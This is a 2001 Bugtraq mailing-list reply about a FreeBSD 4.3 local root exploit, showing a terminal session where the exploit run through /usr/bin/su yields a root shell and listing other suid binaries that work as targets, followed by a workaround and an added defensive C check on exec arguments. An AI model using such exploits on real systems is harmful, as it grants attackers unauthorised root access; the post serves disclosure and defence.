Bugtraq mailing list archives
Re: FreeBSD 4.3 local root
From: "Przemyslaw Frasunek" <venglin () freebsd lublin pl>
Date: Wed, 11 Jul 2001 14:31:06 +0200
Well, after a bunch of tests I've found only two suids which gave me suid shell: /usr/bin/passwd /usr/local/bin/ssh1
/usr/bin/su also works for me:

    riget:venglin:~> egrep -e execl vvfreebsd.c
    if(!execl("/usr/bin/su","su","szymon",0))
    riget:venglin:~> ./v
    vvfreebsd. Written by Georgi Guninski
    shall jump to bfbffe72
    child=57660
    Password:done
    # id
    uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
So, quick workaround should be
Quick workaround is to limit arguments, environment and filter non-ascii characters:

http://www.frasunek.com/sources/security/rexec/

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
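
The workaround named in the message above (limit arguments, limit environment, filter non-ASCII characters) can be expressed as a check run before a set-uid binary is executed. This is an added example, not part of the original post and not the code at the linked URL; the numeric limits and the names `suid_exec_check` and `check_vector` are assumptions.

```c
#include <stddef.h>

/* Assumed limits; the post gives no numbers. */
#define MAX_ARGS     32    /* entries in argv */
#define MAX_ENVS     64    /* entries in envp */
#define MAX_STR_LEN  256   /* bytes per string */
#define MAX_TOTAL    4096  /* bytes across argv and envp together */

enum exec_verdict { EXEC_OK = 0, EXEC_TOO_MANY, EXEC_TOO_LONG, EXEC_NON_ASCII };

/* Check one NULL-terminated string vector against count, length and charset limits. */
static enum exec_verdict check_vector(char *const vec[], size_t max_items, size_t *total)
{
    for (size_t i = 0; vec != NULL && vec[i] != NULL; i++) {
        if (i >= max_items)
            return EXEC_TOO_MANY;
        size_t len = 0;
        for (const unsigned char *p = (const unsigned char *)vec[i]; *p; p++) {
            /* Allow printable ASCII plus tab; reject control and high-bit bytes. */
            if ((*p < 0x20 && *p != '\t') || *p > 0x7e)
                return EXEC_NON_ASCII;
            if (++len > MAX_STR_LEN)
                return EXEC_TOO_LONG;
        }
        *total += len + 1;              /* count the terminating NUL too */
        if (*total > MAX_TOTAL)
            return EXEC_TOO_LONG;
    }
    return EXEC_OK;
}

/* Policy decision for one exec of a set-uid binary (hypothetical helper). */
enum exec_verdict suid_exec_check(char *const argv[], char *const envp[])
{
    size_t total = 0;
    enum exec_verdict v = check_vector(argv, MAX_ARGS, &total);
    if (v != EXEC_OK)
        return v;
    return check_vector(envp, MAX_ENVS, &total);
}
```

A caller would refuse the exec and log the verdict whenever the result is not `EXEC_OK`.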